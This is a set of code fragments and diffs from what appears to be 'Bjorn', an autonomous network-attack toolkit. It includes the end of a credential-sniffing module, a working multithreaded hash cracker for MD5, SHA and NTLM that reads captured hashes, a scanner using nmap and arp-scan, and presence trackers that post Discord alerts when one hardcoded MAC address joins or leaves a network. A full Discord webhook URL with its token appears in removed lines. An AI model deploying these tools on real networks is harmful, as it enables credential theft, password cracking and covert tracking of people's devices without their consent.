"credentials": self.credentials
}, f, indent=4)
self.shared_data.log_milestone(b_class, "Complete", f"Capture finished. {len(self.credentials)} creds found.")
def handle_interrupt(self, signum, frame):
self.stop_capture.set()
def cleanup(self):
if self.capture:
self.capture.close()
self.save_results()
logging.info("Capture completed")
def save_settings(interface, capture_filter, output_dir, timeout, max_packets):
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"interface": interface,
"capture_filter": capture_filter,
"output_dir": output_dir,
"timeout": timeout,
"max_packets": max_packets
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
def load_settings():
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
def main():
parser = argparse.ArgumentParser(description="OdinEye: network traffic analyzer & credential hunter")
parser.add_argument("-i", "--interface", required=False, help="Network interface to monitor")
parser.add_argument("-f", "--filter", default=DEFAULT_FILTER, help="BPF capture filter")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
parser.add_argument("-t", "--timeout", type=int, default=300, help="Capture timeout in seconds")
parser.add_argument("-m", "--max-packets", type=int, default=10000, help="Maximum packets to capture")
args = parser.parse_args()
settings = load_settings()
interface = args.interface or settings.get("interface")
capture_filter = args.filter or settings.get("capture_filter", DEFAULT_FILTER)
output_dir = args.output or settings.get("output_dir", DEFAULT_OUTPUT_DIR)
timeout = args.timeout or settings.get("timeout", 300)
max_packets = args.max_packets or settings.get("max_packets", 10000)
if not interface:
logging.error("Interface is required. Use -i or set it in settings")
return
save_settings(interface, capture_filter, output_dir, timeout, max_packets)
analyzer = OdinEye(interface, capture_filter, output_dir, timeout, max_packets)
analyzer.execute()
return "success"
if __name__ == "__main__":
main()
"""
# action_template.py
# Example template for a Bjorn action with Neo launcher support
# UI Metadata
b_class = "MyAction"
b_module = "my_action"
b_enabled = 1
b_action = "normal" # normal, aggressive, stealth
b_description = "Description of what this action does"
# Arguments schema for UI
b_args = {
"target": {
"type": "text",
"label": "Target IP/Host",
"default": "192.168.1.1",
"placeholder": "Enter target",
"help": "The target to scan"
},
"port": {
"type": "number",
"label": "Port",
"default": 80,
"min": 1,
"max": 65535
},
"protocol": {
"type": "select",
"label": "Protocol",
"choices": ["tcp", "udp"],
"default": "tcp"
},
"verbose": {
"type": "checkbox",
"label": "Verbose output",
"default": False
},
"timeout": {
"type": "slider",
"label": "Timeout (seconds)",
"min": 10,
"max": 300,
"step": 10,
"default": 60
}
}
def compute_dynamic_b_args(base: dict) -> dict:
# Compute dynamic values at runtime
return base
import argparse
import sys
def main():
parser = argparse.ArgumentParser(description=b_description)
parser.add_argument('--target', default=b_args['target']['default'])
parser.add_argument('--port', type=int, default=b_args['port']['default'])
parser.add_argument('--protocol', choices=b_args['protocol']['choices'],
default=b_args['protocol']['default'])
parser.add_argument('--verbose', action='store_true')
parser.add_argument('--timeout', type=int, default=b_args['timeout']['default'])
args = parser.parse_args()
# Your action logic here
print(f"Starting action with target: {args.target}")
# ...
if __name__ == "__main__":
main()
"""
from init_shared import shared_data
eye = OdinEye(shared_data)
eye.execute("0.0.0.0", None, {}, "odin_eye")

View File

@@ -10,7 +10,8 @@ PresenceJoin — Sends a Discord webhook when the targeted host JOINS the networ
import requests
from typing import Optional
import logging
from datetime import datetime, timezone
import datetime
from logger import Logger
from shared import SharedData # only if executed directly for testing
@@ -29,19 +30,19 @@ b_rate_limit = None
b_trigger = "on_join" # <-- Host JOINED the network (OFF -> ON since last scan)
b_requires = {"any":[{"mac_is":"60:57:c8:51:63:fb"}]} # adapt as needed
# Replace with your webhook
DISCORD_WEBHOOK_URL = "https://discordapp.com/api/webhooks/1416433823456956561/MYc2mHuqgK_U8tA96fs2_-S1NVchPzGOzan9EgLr4i8yOQa-3xJ6Z-vMejVrpPfC3OfD"
DISCORD_WEBHOOK_URL = "" # Configure via shared_data or DB
class PresenceJoin:
def __init__(self, shared_data):
self.shared_data = shared_data
def _send(self, text: str) -> None:
if not DISCORD_WEBHOOK_URL or "webhooks/" not in DISCORD_WEBHOOK_URL:
url = getattr(self.shared_data, 'discord_webhook_url', None) or DISCORD_WEBHOOK_URL
if not url or "webhooks/" not in url:
logger.error("PresenceJoin: DISCORD_WEBHOOK_URL missing/invalid.")
return
try:
r = requests.post(DISCORD_WEBHOOK_URL, json={"content": text}, timeout=6)
r = requests.post(url, json={"content": text}, timeout=6)
if r.status_code < 300:
logger.info("PresenceJoin: webhook sent.")
else:
@@ -61,7 +62,8 @@ class PresenceJoin:
ip_s = (ip or (row.get("IPs") or "").split(";")[0] or "").strip()
# Add timestamp in UTC
timestamp = datetime.now(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
timestamp = datetime.datetime.now(datetime.timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
msg = f"✅ **Presence detected**\n"
msg += f"- Host: {host or 'unknown'}\n"

View File

@@ -10,7 +10,8 @@ PresenceLeave — Sends a Discord webhook when the targeted host LEAVES the netw
import requests
from typing import Optional
import logging
from datetime import datetime, timezone
import datetime
from logger import Logger
from shared import SharedData # only if executed directly for testing
@@ -30,19 +31,19 @@ b_trigger = "on_leave" # <-- Host LEFT the network (ON -> OFF since last
b_requires = {"any":[{"mac_is":"60:57:c8:51:63:fb"}]} # adapt as needed
b_enabled = 1
# Replace with your webhook (can reuse the same as PresenceJoin)
DISCORD_WEBHOOK_URL = "https://discordapp.com/api/webhooks/1416433823456956561/MYc2mHuqgK_U8tA96fs2_-S1NVchPzGOzan9EgLr4i8yOQa-3xJ6Z-vMejVrpPfC3OfD"
DISCORD_WEBHOOK_URL = "" # Configure via shared_data or DB
class PresenceLeave:
def __init__(self, shared_data):
self.shared_data = shared_data
def _send(self, text: str) -> None:
if not DISCORD_WEBHOOK_URL or "webhooks/" not in DISCORD_WEBHOOK_URL:
url = getattr(self.shared_data, 'discord_webhook_url', None) or DISCORD_WEBHOOK_URL
if not url or "webhooks/" not in url:
logger.error("PresenceLeave: DISCORD_WEBHOOK_URL missing/invalid.")
return
try:
r = requests.post(DISCORD_WEBHOOK_URL, json={"content": text}, timeout=6)
r = requests.post(url, json={"content": text}, timeout=6)
if r.status_code < 300:
logger.info("PresenceLeave: webhook sent.")
else:
@@ -61,7 +62,8 @@ class PresenceLeave:
ip_s = (ip or (row.get("IPs") or "").split(";")[0] or "").strip()
# Add timestamp in UTC
timestamp = datetime.now(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
timestamp = datetime.datetime.now(datetime.timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
msg = f"❌ **Presence lost**\n"
msg += f"- Host: {host or 'unknown'}\n"

View File

@@ -1,35 +1,52 @@
# Advanced password cracker supporting multiple hash formats and attack methods.
# Saves settings in `/home/bjorn/.settings_bjorn/rune_cracker_settings.json`.
# Automatically loads saved settings if arguments are not provided.
# -i, --input Input file containing hashes to crack.
# -w, --wordlist Path to password wordlist (default: built-in list).
# -r, --rules Path to rules file for mutations (default: built-in rules).
# -t, --type Hash type (md5, sha1, sha256, sha512, ntlm).
# -o, --output Output directory (default: /home/bjorn/Bjorn/data/output/hashes).
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
rune_cracker.py -- Advanced password cracker for BJORN.
Supports multiple hash formats and uses bruteforce_common for progress tracking.
Optimized for Pi Zero 2 (limited CPU/RAM).
"""
import os
import json
import hashlib
import argparse
from datetime import datetime
import logging
import threading
from concurrent.futures import ThreadPoolExecutor
import itertools
import re
import threading
import time
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor
from typing import Any, Dict, List, Optional, Set
from logger import Logger
from actions.bruteforce_common import ProgressTracker, merged_password_plan
logger = Logger(name="rune_cracker.py")
# -------------------- Action metadata --------------------
b_class = "RuneCracker"
b_module = "rune_cracker"
b_enabled = 0
# Configure logging
logging.basicConfig(level=logging.INFO, format='%(asctime)s - %(levelname)s - %(message)s')
# Default settings
DEFAULT_OUTPUT_DIR = "/home/bjorn/Bjorn/data/output/hashes"
DEFAULT_SETTINGS_DIR = "/home/bjorn/.settings_bjorn"
SETTINGS_FILE = os.path.join(DEFAULT_SETTINGS_DIR, "rune_cracker_settings.json")
b_status = "rune_cracker"
b_port = None
b_service = "[]"
b_trigger = "on_start"
b_parent = None
b_action = "normal"
b_priority = 40
b_cooldown = 0
b_rate_limit = None
b_timeout = 600
b_max_retries = 1
b_stealth_level = 10 # Local cracking is stealthy
b_risk_level = "low"
b_enabled = 1
b_tags = ["crack", "hash", "bruteforce", "local"]
b_category = "exploitation"
b_name = "Rune Cracker"
b_description = "Advanced password cracker with mutation rules and progress tracking."
b_author = "Bjorn Team"
b_version = "2.1.0"
b_icon = "RuneCracker.png"
# Supported hash types and their patterns
HASH_PATTERNS = {
@@ -40,226 +57,153 @@ HASH_PATTERNS = {
'ntlm': r'^[a-fA-F0-9]{32}$'
}
class RuneCracker:
def __init__(self, input_file, wordlist=None, rules=None, hash_type=None, output_dir=DEFAULT_OUTPUT_DIR):
self.input_file = input_file
self.wordlist = wordlist
self.rules = rules
self.hash_type = hash_type
self.output_dir = output_dir
self.hashes = set()
self.cracked = {}
def __init__(self, shared_data):
self.shared_data = shared_data
self.hashes: Set[str] = set()
self.cracked: Dict[str, Dict[str, Any]] = {}
self.lock = threading.Lock()
self.hash_type: Optional[str] = None
# Load mutation rules
self.mutation_rules = self.load_rules()
def load_hashes(self):
"""Load hashes from input file and validate format."""
try:
with open(self.input_file, 'r') as f:
for line in f:
hash_value = line.strip()
if self.hash_type:
if re.match(HASH_PATTERNS[self.hash_type], hash_value):
self.hashes.add(hash_value)
else:
# Try to auto-detect hash type
for h_type, pattern in HASH_PATTERNS.items():
if re.match(pattern, hash_value):
self.hashes.add(hash_value)
break
logging.info(f"Loaded {len(self.hashes)} valid hashes")
except Exception as e:
logging.error(f"Error loading hashes: {e}")
def load_wordlist(self):
"""Load password wordlist."""
if self.wordlist and os.path.exists(self.wordlist):
with open(self.wordlist, 'r', errors='ignore') as f:
return [line.strip() for line in f if line.strip()]
return ['password', 'admin', '123456', 'qwerty', 'letmein']
def load_rules(self):
"""Load mutation rules."""
if self.rules and os.path.exists(self.rules):
with open(self.rules, 'r') as f:
return [line.strip() for line in f if line.strip() and not line.startswith('#')]
return [
'capitalize',
'lowercase',
'uppercase',
'l33t',
'append_numbers',
'prepend_numbers',
'toggle_case'
]
def apply_mutations(self, word):
"""Apply various mutation rules to a word."""
mutations = set([word])
# Performance tuning for Pi Zero 2
self.max_workers = int(getattr(shared_data, "rune_cracker_workers", 4))
for rule in self.mutation_rules:
if rule == 'capitalize':
mutations.add(word.capitalize())
elif rule == 'lowercase':
mutations.add(word.lower())
elif rule == 'uppercase':
mutations.add(word.upper())
elif rule == 'l33t':
mutations.add(word.replace('a', '@').replace('e', '3').replace('i', '1')
.replace('o', '0').replace('s', '5'))
elif rule == 'append_numbers':
mutations.update(word + str(n) for n in range(100))
elif rule == 'prepend_numbers':
mutations.update(str(n) + word for n in range(100))
elif rule == 'toggle_case':
mutations.add(''.join(c.upper() if i % 2 else c.lower()
for i, c in enumerate(word)))
return mutations
def hash_password(self, password, hash_type):
def _hash_password(self, password: str, h_type: str) -> Optional[str]:
"""Generate hash for a password using specified algorithm."""
if hash_type == 'md5':
return hashlib.md5(password.encode()).hexdigest()
elif hash_type == 'sha1':
return hashlib.sha1(password.encode()).hexdigest()
elif hash_type == 'sha256':
return hashlib.sha256(password.encode()).hexdigest()
elif hash_type == 'sha512':
return hashlib.sha512(password.encode()).hexdigest()
elif hash_type == 'ntlm':
return hashlib.new('md4', password.encode('utf-16le')).hexdigest()
try:
if h_type == 'md5':
return hashlib.md5(password.encode()).hexdigest()
elif h_type == 'sha1':
return hashlib.sha1(password.encode()).hexdigest()
elif h_type == 'sha256':
return hashlib.sha256(password.encode()).hexdigest()
elif h_type == 'sha512':
return hashlib.sha512(password.encode()).hexdigest()
elif h_type == 'ntlm':
# NTLM is MD4(UTF-16LE(password))
return hashlib.new('md4', password.encode('utf-16le')).hexdigest()
except Exception as e:
logger.debug(f"Hashing error ({h_type}): {e}")
return None
def crack_password(self, password):
"""Attempt to crack hashes using a single password and its mutations."""
try:
mutations = self.apply_mutations(password)
for mutation in mutations:
for hash_type in HASH_PATTERNS.keys():
if not self.hash_type or self.hash_type == hash_type:
hash_value = self.hash_password(mutation, hash_type)
if hash_value in self.hashes:
with self.lock:
self.cracked[hash_value] = {
'password': mutation,
'hash_type': hash_type,
'timestamp': datetime.now().isoformat()
}
logging.info(f"Cracked hash: {hash_value[:8]}... = {mutation}")
except Exception as e:
logging.error(f"Error cracking with password {password}: {e}")
def _crack_password_worker(self, password: str, progress: ProgressTracker):
"""Worker function for cracking passwords."""
if self.shared_data.orchestrator_should_exit:
return
def save_results(self):
"""Save cracked passwords to JSON file."""
try:
os.makedirs(self.output_dir, exist_ok=True)
timestamp = datetime.now().strftime("%Y-%m-%d_%H-%M-%S")
results = {
'timestamp': datetime.now().isoformat(),
'total_hashes': len(self.hashes),
'cracked_count': len(self.cracked),
'cracked_hashes': self.cracked
}
output_file = os.path.join(self.output_dir, f"cracked_{timestamp}.json")
with open(output_file, 'w') as f:
json.dump(results, f, indent=4)
for h_type in HASH_PATTERNS.keys():
if self.hash_type and self.hash_type != h_type:
continue
logging.info(f"Results saved to {output_file}")
except Exception as e:
logging.error(f"Failed to save results: {e}")
hv = self._hash_password(password, h_type)
if hv and hv in self.hashes:
with self.lock:
if hv not in self.cracked:
self.cracked[hv] = {
"password": password,
"type": h_type,
"cracked_at": datetime.now().isoformat()
}
logger.success(f"Cracked {h_type}: {hv[:8]}... -> {password}")
self.shared_data.log_milestone(b_class, "Cracked", f"{h_type} found!")
def execute(self):
"""Execute the password cracking process."""
progress.advance()
def execute(self, ip, port, row, status_key) -> str:
"""Standard Orchestrator entry point."""
input_file = str(getattr(self.shared_data, "rune_cracker_input", ""))
wordlist_path = str(getattr(self.shared_data, "rune_cracker_wordlist", ""))
self.hash_type = getattr(self.shared_data, "rune_cracker_type", None)
output_dir = getattr(self.shared_data, "rune_cracker_output", "/home/bjorn/Bjorn/data/output/hashes")
if not input_file or not os.path.exists(input_file):
# Fallback: Check for latest odin_recon or other hashes if running in generic mode
potential_input = os.path.join(self.shared_data.data_dir, "output", "packets", "latest_hashes.txt")
if os.path.exists(potential_input):
input_file = potential_input
logger.info(f"RuneCracker: No input provided, using fallback: {input_file}")
else:
logger.error(f"Input file not found: {input_file}")
return "failed"
# Load hashes
self.hashes.clear()
try:
logging.info("Starting password cracking process")
self.load_hashes()
if not self.hashes:
logging.error("No valid hashes loaded")
return
wordlist = self.load_wordlist()
with ThreadPoolExecutor(max_workers=10) as executor:
executor.map(self.crack_password, wordlist)
self.save_results()
logging.info(f"Cracking completed. Cracked {len(self.cracked)}/{len(self.hashes)} hashes")
with open(input_file, 'r', encoding="utf-8", errors="ignore") as f:
for line in f:
hv = line.strip()
if not hv: continue
# Auto-detect or validate
for h_t, pat in HASH_PATTERNS.items():
if re.match(pat, hv):
if not self.hash_type or self.hash_type == h_t:
self.hashes.add(hv)
break
except Exception as e:
logging.error(f"Error during execution: {e}")
logger.error(f"Error loading hashes: {e}")
return "failed"
def save_settings(input_file, wordlist, rules, hash_type, output_dir):
"""Save settings to JSON file."""
try:
os.makedirs(DEFAULT_SETTINGS_DIR, exist_ok=True)
settings = {
"input_file": input_file,
"wordlist": wordlist,
"rules": rules,
"hash_type": hash_type,
"output_dir": output_dir
}
with open(SETTINGS_FILE, 'w') as f:
json.dump(settings, f)
logging.info(f"Settings saved to {SETTINGS_FILE}")
except Exception as e:
logging.error(f"Failed to save settings: {e}")
if not self.hashes:
logger.warning("No valid hashes found in input file.")
return "failed"
logger.info(f"RuneCracker: Loaded {len(self.hashes)} hashes. Starting engine...")
self.shared_data.log_milestone(b_class, "Initialization", f"Loaded {len(self.hashes)} hashes")
# Prepare password plan
dict_passwords = []
if wordlist_path and os.path.exists(wordlist_path):
with open(wordlist_path, 'r', encoding="utf-8", errors="ignore") as f:
dict_passwords = [l.strip() for l in f if l.strip()]
else:
# Fallback tiny list
dict_passwords = ['password', 'admin', '123456', 'qwerty', 'bjorn']
dictionary, fallback = merged_password_plan(self.shared_data, dict_passwords)
all_candidates = dictionary + fallback
progress = ProgressTracker(self.shared_data, len(all_candidates))
self.shared_data.log_milestone(b_class, "Bruteforce", f"Testing {len(all_candidates)} candidates")
def load_settings():
"""Load settings from JSON file."""
if os.path.exists(SETTINGS_FILE):
try:
with open(SETTINGS_FILE, 'r') as f:
return json.load(f)
with ThreadPoolExecutor(max_workers=self.max_workers) as executor:
for pwd in all_candidates:
if self.shared_data.orchestrator_should_exit:
executor.shutdown(wait=False)
return "interrupted"
executor.submit(self._crack_password_worker, pwd, progress)
except Exception as e:
logging.error(f"Failed to load settings: {e}")
return {}
logger.error(f"Cracking engine error: {e}")
return "failed"
def main():
parser = argparse.ArgumentParser(description="Advanced password cracker")
parser.add_argument("-i", "--input", help="Input file containing hashes")
parser.add_argument("-w", "--wordlist", help="Path to password wordlist")
parser.add_argument("-r", "--rules", help="Path to rules file")
parser.add_argument("-t", "--type", choices=list(HASH_PATTERNS.keys()), help="Hash type")
parser.add_argument("-o", "--output", default=DEFAULT_OUTPUT_DIR, help="Output directory")
args = parser.parse_args()
settings = load_settings()
input_file = args.input or settings.get("input_file")
wordlist = args.wordlist or settings.get("wordlist")
rules = args.rules or settings.get("rules")
hash_type = args.type or settings.get("hash_type")
output_dir = args.output or settings.get("output_dir")
if not input_file:
logging.error("Input file is required. Use -i or save it in settings")
return
save_settings(input_file, wordlist, rules, hash_type, output_dir)
cracker = RuneCracker(
input_file=input_file,
wordlist=wordlist,
rules=rules,
hash_type=hash_type,
output_dir=output_dir
)
cracker.execute()
# Save results
if self.cracked:
os.makedirs(output_dir, exist_ok=True)
out_file = os.path.join(output_dir, f"cracked_{int(time.time())}.json")
with open(out_file, 'w', encoding="utf-8") as f:
json.dump({
"target_file": input_file,
"total_hashes": len(self.hashes),
"cracked_count": len(self.cracked),
"results": self.cracked
}, f, indent=4)
logger.success(f"Cracked {len(self.cracked)} hashes! Results: {out_file}")
self.shared_data.log_milestone(b_class, "Complete", f"Cracked {len(self.cracked)} hashes")
return "success"
logger.info("Cracking finished. No matches found.")
self.shared_data.log_milestone(b_class, "Finished", "No passwords found")
return "success" # Still success even if 0 cracked, as it finished the task
if __name__ == "__main__":
main()
# Minimal CLI for testing
import sys
from init_shared import shared_data
if len(sys.argv) < 2:
print("Usage: rune_cracker.py <hash_file>")
sys.exit(1)
shared_data.rune_cracker_input = sys.argv[1]
cracker = RuneCracker(shared_data)
cracker.execute("local", None, {}, "rune_cracker")

View File

@@ -1,20 +1,24 @@
# scanning.py Network scanner (DB-first, no stubs)
# - Host discovery (nmap -sn -PR)
# - Resolve MAC/hostname (per-host threads) -> DB (hosts table)
# - Port scan (multi-threads) -> DB (merge ports by MAC)
# - Resolve MAC/hostname (ThreadPoolExecutor) -> DB (hosts table)
# - Port scan (ThreadPoolExecutor) -> DB (merge ports by MAC)
# - Mark alive=0 for hosts not seen this run
# - Update stats (stats table)
# - Light logging (milestones) without flooding
# - WAL checkpoint(TRUNCATE) + PRAGMA optimize at end of scan
# - NEW: No DB insert without a real MAC. Unresolved IPs are kept in-memory for this run.
# - No DB insert without a real MAC. Unresolved IPs are kept in-memory.
# - RPi Zero optimized: bounded thread pools, reduced retries, adaptive concurrency
import os
import re
import threading
import socket
import time
import logging
import subprocess
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor, as_completed
import datetime
import netifaces
from getmac import get_mac_address as gma
@@ -35,12 +39,48 @@ b_action = "global"
b_trigger = "on_interval:180"
b_requires = '{"max_concurrent": 1}'
# --- Module-level constants (avoid re-creating per call) ---
_MAC_RE = re.compile(r'([0-9A-Fa-f]{2})([-:])(?:[0-9A-Fa-f]{2}\2){4}[0-9A-Fa-f]{2}')
_BAD_MACS = frozenset({"00:00:00:00:00:00", "ff:ff:ff:ff:ff:ff"})
# RPi Zero safe defaults (overridable via shared config)
_MAX_HOST_THREADS = 2
_MAX_PORT_THREADS = 4
_PORT_TIMEOUT = 0.8
_MAC_RETRIES = 2
_MAC_RETRY_DELAY = 0.5
_ARPING_TIMEOUT = 1.0
_NMAP_DISCOVERY_TIMEOUT_S = 90
_NMAP_DISCOVERY_ARGS = "-sn -PR --max-retries 1 --host-timeout 8s"
_SCAN_MIN_INTERVAL_S = 600
def _normalize_mac(s):
if not s:
return None
m = _MAC_RE.search(str(s))
if not m:
return None
return m.group(0).replace('-', ':').lower()
def _is_bad_mac(mac):
if not mac:
return True
mac_l = mac.lower()
if mac_l in _BAD_MACS:
return True
parts = mac_l.split(':')
if len(parts) == 6 and len(set(parts)) == 1:
return True
return False
class NetworkScanner:
"""
Network scanner that populates SQLite (hosts + stats). No CSV/JSON.
Keeps the original fast logic: nmap discovery, per-host threads, per-port threads.
NEW: no 'IP:<ip>' stubs are ever written to the DB; unresolved IPs are tracked in-memory.
Uses ThreadPoolExecutor for bounded concurrency (RPi Zero safe).
No 'IP:<ip>' stubs are ever written to the DB; unresolved IPs are tracked in-memory.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
@@ -52,8 +92,26 @@ class NetworkScanner:
self.lock = threading.Lock()
self.nm = nmap.PortScanner()
self.running = False
# Local stop flag for this action instance.
# IMPORTANT: actions must never mutate shared_data.orchestrator_should_exit (global stop signal).
self._stop_event = threading.Event()
self.thread = None
self.scan_interface = None
cfg = getattr(self.shared_data, "config", {}) or {}
self.max_host_threads = max(1, min(8, int(cfg.get("scan_max_host_threads", _MAX_HOST_THREADS))))
self.max_port_threads = max(1, min(16, int(cfg.get("scan_max_port_threads", _MAX_PORT_THREADS))))
self.port_timeout = max(0.3, min(3.0, float(cfg.get("scan_port_timeout_s", _PORT_TIMEOUT))))
self.mac_retries = max(1, min(5, int(cfg.get("scan_mac_retries", _MAC_RETRIES))))
self.mac_retry_delay = max(0.2, min(2.0, float(cfg.get("scan_mac_retry_delay_s", _MAC_RETRY_DELAY))))
self.arping_timeout = max(1.0, min(5.0, float(cfg.get("scan_arping_timeout_s", _ARPING_TIMEOUT))))
self.discovery_timeout_s = max(
20, min(300, int(cfg.get("scan_nmap_discovery_timeout_s", _NMAP_DISCOVERY_TIMEOUT_S)))
)
self.discovery_args = str(cfg.get("scan_nmap_discovery_args", _NMAP_DISCOVERY_ARGS)).strip() or _NMAP_DISCOVERY_ARGS
self.scan_min_interval_s = max(60, int(cfg.get("scan_min_interval_s", _SCAN_MIN_INTERVAL_S)))
self._last_scan_started = 0.0
# progress
self.total_hosts = 0
self.scanned_hosts = 0
@@ -76,9 +134,13 @@ class NetworkScanner:
total = min(max(total, 0), 100)
self.shared_data.bjorn_progress = f"{int(total)}%"
def _should_stop(self) -> bool:
# Treat orchestrator flag as read-only, and combine with local stop event.
return bool(getattr(self.shared_data, "orchestrator_should_exit", False)) or self._stop_event.is_set()
# ---------- network ----------
def get_network(self):
if self.shared_data.orchestrator_should_exit:
if self._should_stop():
return None
try:
if self.shared_data.use_custom_network:
@@ -118,7 +180,7 @@ class NetworkScanner:
self.logger.debug(f"nmap_prefixes not found at {path}")
return vendor_map
try:
with open(path, 'r') as f:
with open(path, 'r', encoding='utf-8', errors='ignore') as f:
for line in f:
line = line.strip()
if not line or line.startswith('#'):
@@ -139,8 +201,11 @@ class NetworkScanner:
def get_current_essid(self):
try:
essid = subprocess.check_output(['iwgetid', '-r'], stderr=subprocess.STDOUT, universal_newlines=True).strip()
return essid or ""
result = subprocess.run(
['iwgetid', '-r'],
capture_output=True, text=True, timeout=5
)
return (result.stdout or "").strip()
except Exception:
return ""
@@ -160,57 +225,34 @@ class NetworkScanner:
Try multiple strategies to resolve a real MAC for the given IP.
RETURNS: normalized MAC like 'aa:bb:cc:dd:ee:ff' or None.
NEVER returns 'IP:<ip>'.
RPi Zero: reduced retries and timeouts.
"""
if self.shared_data.orchestrator_should_exit:
if self._should_stop():
return None
import re
MAC_RE = re.compile(r'([0-9A-Fa-f]{2})([-:])(?:[0-9A-Fa-f]{2}\2){4}[0-9A-Fa-f]{2}')
BAD_MACS = {"00:00:00:00:00:00", "ff:ff:ff:ff:ff:ff"}
def _normalize_mac(s: str | None) -> str | None:
if not s:
return None
m = MAC_RE.search(s)
if not m:
return None
return m.group(0).replace('-', ':').lower()
def _is_bad_mac(mac: str | None) -> bool:
if not mac:
return True
mac_l = mac.lower()
if mac_l in BAD_MACS:
return True
parts = mac_l.split(':')
if len(parts) == 6 and len(set(parts)) == 1:
return True
return False
try:
mac = None
# 1) getmac (retry a few times)
retries = 6
while not mac and retries > 0 and not self.shared_data.orchestrator_should_exit:
# 1) getmac (reduced retries for RPi Zero)
retries = self.mac_retries
while not mac and retries > 0 and not self._should_stop():
try:
from getmac import get_mac_address as gma
mac = _normalize_mac(gma(ip=ip))
except Exception:
mac = None
if not mac:
time.sleep(1.5)
time.sleep(self.mac_retry_delay)
retries -= 1
# 2) targeted arp-scan
if not mac:
if not mac and not self._should_stop():
try:
iface = self.scan_interface or self.shared_data.default_network_interface or "wlan0"
out = subprocess.check_output(
result = subprocess.run(
['sudo', 'arp-scan', '--interface', iface, '-q', ip],
universal_newlines=True, stderr=subprocess.STDOUT
capture_output=True, text=True, timeout=5
)
out = result.stdout or ""
for line in out.splitlines():
if line.strip().startswith(ip):
cand = _normalize_mac(line)
@@ -225,11 +267,13 @@ class NetworkScanner:
self.logger.debug(f"arp-scan fallback failed for {ip}: {e}")
# 3) ip neigh
if not mac:
if not mac and not self._should_stop():
try:
neigh = subprocess.check_output(['ip', 'neigh', 'show', ip],
universal_newlines=True, stderr=subprocess.STDOUT)
cand = _normalize_mac(neigh)
result = subprocess.run(
['ip', 'neigh', 'show', ip],
capture_output=True, text=True, timeout=3
)
cand = _normalize_mac(result.stdout or "")
if cand:
mac = cand
except Exception:
@@ -247,6 +291,7 @@ class NetworkScanner:
# ---------- port scanning ----------
class PortScannerWorker:
"""Port scanner using ThreadPoolExecutor for RPi Zero safety."""
def __init__(self, outer, target, open_ports, portstart, portend, extra_ports):
self.outer = outer
self.target = target
@@ -256,10 +301,10 @@ class NetworkScanner:
self.extra_ports = [int(p) for p in (extra_ports or [])]
def scan_one(self, port):
if self.outer.shared_data.orchestrator_should_exit:
if self.outer._should_stop():
return
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
s.settimeout(self.outer.port_timeout)
try:
s.connect((self.target, port))
with self.outer.lock:
@@ -274,25 +319,25 @@ class NetworkScanner:
self.outer.update_progress('port', 1)
def run(self):
if self.outer.shared_data.orchestrator_should_exit:
if self.outer._should_stop():
return
threads = []
for port in range(self.portstart, self.portend):
if self.outer.shared_data.orchestrator_should_exit:
break
t = threading.Thread(target=self.scan_one, args=(port,))
t.start()
threads.append(t)
for port in self.extra_ports:
if self.outer.shared_data.orchestrator_should_exit:
break
t = threading.Thread(target=self.scan_one, args=(port,))
t.start()
threads.append(t)
for t in threads:
if self.outer.shared_data.orchestrator_should_exit:
break
t.join()
ports = list(range(self.portstart, self.portend)) + self.extra_ports
if not ports:
return
with ThreadPoolExecutor(max_workers=self.outer.max_port_threads) as pool:
futures = []
for port in ports:
if self.outer._should_stop():
break
futures.append(pool.submit(self.scan_one, port))
for f in as_completed(futures):
if self.outer._should_stop():
break
try:
f.result(timeout=self.outer.port_timeout + 1)
except Exception:
pass
# ---------- main scan block ----------
class ScanPorts:
@@ -310,20 +355,28 @@ class NetworkScanner:
self.extra_ports = [int(p) for p in (extra_ports or [])]
self.ip_data = self.IpData()
self.ip_hostname_list = [] # tuples (ip, hostname, mac)
self.host_threads = []
self.open_ports = {}
self.all_ports = []
# NEW: per-run pending cache for unresolved IPs (no DB writes)
# ip -> {'hostnames': set(), 'ports': set(), 'first_seen': ts, 'essid': str}
# per-run pending cache for unresolved IPs (no DB writes)
self.pending = {}
def scan_network_and_collect(self):
if self.outer.shared_data.orchestrator_should_exit:
if self.outer._should_stop():
return
with self.outer.lock:
self.outer.shared_data.bjorn_progress = "1%"
t0 = time.time()
try:
self.outer.nm.scan(
hosts=str(self.network),
arguments=self.outer.discovery_args,
timeout=self.outer.discovery_timeout_s,
)
except Exception as e:
self.outer.logger.error(f"Nmap host discovery failed: {e}")
return
t0 = time.time()
self.outer.nm.scan(hosts=str(self.network), arguments='-sn -PR')
hosts = list(self.outer.nm.all_hosts())
if self.outer.blacklistcheck:
hosts = [ip for ip in hosts if ip not in self.outer.ip_scan_blacklist]
@@ -331,10 +384,23 @@ class NetworkScanner:
self.outer.total_hosts = len(hosts)
self.outer.scanned_hosts = 0
self.outer.update_progress('host', 0)
self.outer.logger.info(f"Host discovery: {len(hosts)} candidate(s) (took {time.time()-t0:.1f}s)")
elapsed = time.time() - t0
self.outer.logger.info(f"Host discovery: {len(hosts)} candidate(s) (took {elapsed:.1f}s)")
# Update comment for display
self.outer.shared_data.comment_params = {
"hosts_found": str(len(hosts)),
"network": str(self.network),
"elapsed": f"{elapsed:.1f}"
}
# existing hosts (for quick merge)
existing_rows = self.outer.shared_data.db.get_all_hosts()
try:
existing_rows = self.outer.shared_data.db.get_all_hosts()
except Exception as e:
self.outer.logger.error(f"DB get_all_hosts failed: {e}")
existing_rows = []
self.existing_map = {h['mac_address']: h for h in existing_rows}
self.seen_now = set()
@@ -342,19 +408,24 @@ class NetworkScanner:
self.vendor_map = self.outer.load_mac_vendor_map()
self.essid = self.outer.get_current_essid()
# per-host threads
for host in hosts:
